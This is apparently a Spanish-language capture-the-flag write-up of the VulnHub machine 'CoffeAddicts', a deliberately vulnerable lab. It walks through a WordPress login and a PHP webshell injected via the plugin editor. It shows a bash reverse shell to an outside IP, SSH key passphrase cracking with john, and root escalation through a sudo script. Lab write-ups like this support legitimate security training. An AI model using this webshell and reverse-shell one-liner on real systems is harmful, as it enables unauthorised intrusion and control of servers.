cd ~/blog

~/writeups/vulnhub/24-coffeaddicts.md

24 - CoffeAddicts

easy Linux vulnhub 04-11-2023
WordPress plugin editor RCESSH key passphrase crackingsudo script Privesc
www.vulnhub.com/entry/coffee-addicts-1,699/

~1 min de lectura


Enumeramos puertos (22, 80 — WordPress). El sitio pide añadir el dominio coffeeaddicts.thm al /etc/hosts. En un comentario del blog se menciona que la contraseña está publicada en el post; bajo una foto hay un texto que usamos para entrar a wp-login.php.

En el dashboard, el editor de plugins está habilitado; inyectamos una webshell en akismet.php:

<?php
	system($_GET['cmd']);
?>
http://coffeeaddicts.thm/wordpress/wp-content/plugins/akismet/akismet.php?cmd=id
# reverse shell:
...akismet.php?cmd=bash -c "bash -i >& /dev/tcp/192.168.1.10/1234 0>&1"

La shell es restringida; escapamos y la estabilizamos (Tratamiento de la TTY):

script /dev/null -c bash
export TERM=xterm

En el home encontramos la primera flag y una id_rsa de otro usuario (badbyte, el ciberdelincuente que vulneró el blog). Crackeamos su passphrase con john y entramos por SSH:

 ssh badbyte@192.168.1.50 -i id_rsa

Revisamos sudo -l:

User badbyte may run the following commands on CoffeeAdicts:
    (root) /opt/BadByte/shell

/opt/BadByte/shell genera una shell de root; lo ejecutamos y obtenemos la flag final.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados